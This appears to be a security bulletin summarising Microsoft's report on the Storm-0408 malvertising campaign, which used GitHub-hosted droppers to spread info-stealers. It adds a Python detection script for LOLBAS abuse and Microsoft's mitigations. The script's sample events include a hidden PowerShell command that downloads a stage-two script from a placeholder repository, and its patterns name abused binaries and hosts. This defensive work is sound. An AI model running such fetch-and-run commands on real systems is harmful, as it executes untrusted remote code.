Malvertising Campaign Leads to Info Stealers Hosted on GitHub
Summary:
A new blog post by Microsoft highlights a large-scale malvertising campaign that has been active since early December 2024 and has impacted nearly one million devices to date. The campaign, tracked under an activity cluster Microsoft refers to as Storm-0408, has targeted a wide range of organizations and industries, affecting both consumer and enterprise devices, with the end goal of deploying info-stealers on targeted systems and exfiltrating data of interest. Based on intrusions observed by Microsoft, the actors use illegal pirated streaming websites to embed malvertising redirectors within movie frames; these route traffic through one or two additional malicious redirectors before landing on a further website, such as a malware or tech support scam site, which in turn redirects to a GitHub repository hosting the malicious payloads.
According to Microsoft, the malware hosted on GitHub is designed to establish an initial foothold on the victim’s device and act as a dropper for additional payloads such as Lumma Stealer and Doenerium, both of which are capable of collecting and exfiltrating system and browser information from targeted devices. “Depending on the initial payload, the deployment of NetSupport, a remote monitoring and management (RMM) software, was also often deployed alongside the infostealer. Besides the information stealers, PowerShell, JavaScript, VBScript, and AutoIT scripts were run on the host. The threat actors incorporated use of living-off-the-land binaries and scripts (LOLBAS) like PowerShell.exe, MSBuild.exe, and RegAsm.exe for C2 and data exfiltration of user data and browser credentials,” note researchers in their new blog post.
Security Officer Comments:
Threat actors continue to exploit legitimate platforms to host malicious infrastructure, making it increasingly difficult for security systems to detect and mitigate such threats. In addition to GitHub, Microsoft has observed malicious payloads being hosted on popular services such as Discord and Dropbox. The widespread use and trust placed in these platforms provide an ideal opportunity for attackers to deliver their payloads, often bypassing endpoint security solutions with little chance of detection. The method of injecting malvertising redirectors into pirated movies hosted on illegal streaming websites is rather interesting. This tactic enables threat actors to easily infect unsuspecting users seeking to access unauthorized content, further demonstrating the evolving sophistication of cybercriminals in exploiting such sites for malicious purposes.
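The two observations above that a defender can act on immediately are the LOLBAS chain (PowerShell.exe, MSBuild.exe, RegAsm.exe launched by script hosts or a browser) and payload retrieval from trusted hosting services (GitHub, Discord, Dropbox). The following is an added example, not code from Microsoft's post, that runs two such detection rules over constructed Sysmon-style process-creation events; the parent-process list and the hosting hostnames are assumptions, not indicators from the post.

```python
import re

# LOLBAS the post names as used for C2 and data exfiltration.
LOLBAS = {"powershell.exe", "msbuild.exe", "regasm.exe"}
# Assumed parents that should rarely spawn those binaries: browsers (the
# malvertising entry point) and the script hosts for the JS/VBS/AutoIT stages.
SUSPECT_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe", "autoit3.exe"}
# Assumed URL patterns for the legitimate services the post says were abused.
HOSTING = re.compile(
    r"(raw\.githubusercontent\.com|github\.com/[^/\s]+/[^/\s]+/releases"
    r"|cdn\.discordapp\.com|dl\.dropboxusercontent\.com|dropbox\.com)", re.I)

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event):
    """Return the rule names an event matches (empty list when benign)."""
    hits = []
    image, parent = basename(event["image"]), basename(event["parent"])
    if image in LOLBAS and parent in SUSPECT_PARENTS:
        hits.append("lolbas_from_browser_or_script_host")
    if image in LOLBAS and HOSTING.search(event["cmdline"]):
        hits.append("payload_fetch_from_trusted_hosting")
    return hits

def scan(events):
    """(pid, hits) for every event that triggers at least one rule."""
    return [(e["pid"], evaluate(e)) for e in events if evaluate(e)]

# Constructed sample events; none of these values come from the post.
SAMPLE_EVENTS = [
    {"pid": 101, "parent": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c iwr https://raw.githubusercontent.com/"
                "CONSTRUCTED-ORG/CONSTRUCTED-REPO/main/stage2.ps1"},
    {"pid": 102, "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": r"RegAsm.exe C:\Users\Public\Libraries\upd.dll"},
    {"pid": 103, "parent": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe App.csproj"},          # benign developer build
    {"pid": 104, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},       # benign admin use
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS):
        print(pid, hits)
```

Both rules are deliberately narrow; in production they belong alongside the parent-child and network telemetry of your EDR rather than as a standalone script.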
Suggested Corrections:
Recommendations from Microsoft:
- Require multifactor authentication (MFA). While certain attacks such as adversary-in-the-middle (AiTM) phishing attempt to circumvent MFA, implementation of MFA remains an essential pillar in identity security and is highly effective at stopping a variety of threats.
- Leverage phishing-resistant authentication methods such as FIDO Tokens, or Microsoft Authenticator with passkey. Avoid telephony-based MFA methods to avoid risks associated with SIM-jacking.
- Implement Entra ID Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
- Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
- Enable Network Level Authentication for Remote Desktop Service connections.
- Enable Local Security Authority (LSA) protection to block credential stealing from the Windows local security authority subsystem.
- AppLocker can restrict specific software tools prohibited within the organization, such as reconnaissance, fingerprinting, and RMM tools, or grant access to only specific users.
Link(s):
https://www.microsoft.com/en-us/sec...aign-leads-to-info-stealers-hosted-on-github/